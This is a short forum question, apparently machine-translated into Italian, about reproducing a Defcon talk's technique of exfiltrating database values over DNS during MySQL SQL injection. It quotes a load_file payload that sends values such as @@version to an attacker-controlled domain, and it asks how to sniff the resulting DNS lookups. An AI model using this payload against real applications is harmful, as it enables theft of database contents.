Stavo guardando articolo eccellente da Defcon 15 che era il recupero dei dati su DNS durante SQL Injection Attacks. ( link ). In questo l'oratore ha dimostrato gli attacchi contro MSSQL.
Ho appena provato a riprodurre lo stesso problema ma con il server MySQL, con una piccola ricerca ho trovato load_file(\\dns.mysite.com\)
può colpire server DNS esponendo qualsiasi concatenazione di attacker in load_file()
come @@ version, user () ecc se L'applicazione è vulnerabile . La domanda è: come potrei effettivamente mantenere il SNIFF THE DNS Request fatto sul mio server, mentre guardi nel video chi parla usa uno Sniffer DNS per registrare la richiesta Hit dal sito vulnerabile al suo Server.
Qualcuno ha degli input su come impostare praticamente un server web di un attaccante (mysite.com) tramite DNS Sniffing o altre tecniche che ho perso qui?